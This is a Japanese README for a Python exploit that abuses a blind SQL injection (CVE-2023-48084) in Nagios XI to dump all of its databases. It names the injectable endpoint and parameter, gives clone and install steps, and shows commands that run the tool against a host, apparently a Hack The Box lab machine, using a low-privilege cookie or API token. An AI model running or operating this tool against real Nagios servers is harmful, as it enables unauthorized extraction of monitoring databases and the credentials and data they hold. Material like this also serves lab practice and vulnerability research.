
NagiosXI の sqli 脆弱性を悪用して、すべてのデータベースをダンプする Python プログラム
CVE-2023-48084 用の Python エクスプロイト -> Nagios XI 11.3.5 より前のバージョンは、一括変更ツールを介した SQL インジェクションの脆弱性が存在することが判明しました。
このエクスプロイトは /admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(<実行する SQL コマンド>) を使用して SQL クエリを実行し、ブラインド SQL インジェクションを悪用します...
リポジトリをクローンして requirements.txt をインストールします
git clone https://github.com/Hamibubu/CVE-2023-48084.git
cd CVE-2023-48084
pip install -r requirements.txt
次にプログラムを実行します。非管理者セッションの Cookie または API トークンが必要です。例:
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -a <token>
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -c <cookie>
デフォルトでは、スキーマから始まるデータベース全体のダンプを試みます。より高速にしたい場合は、コードを確認して必要な部分だけを利用してください。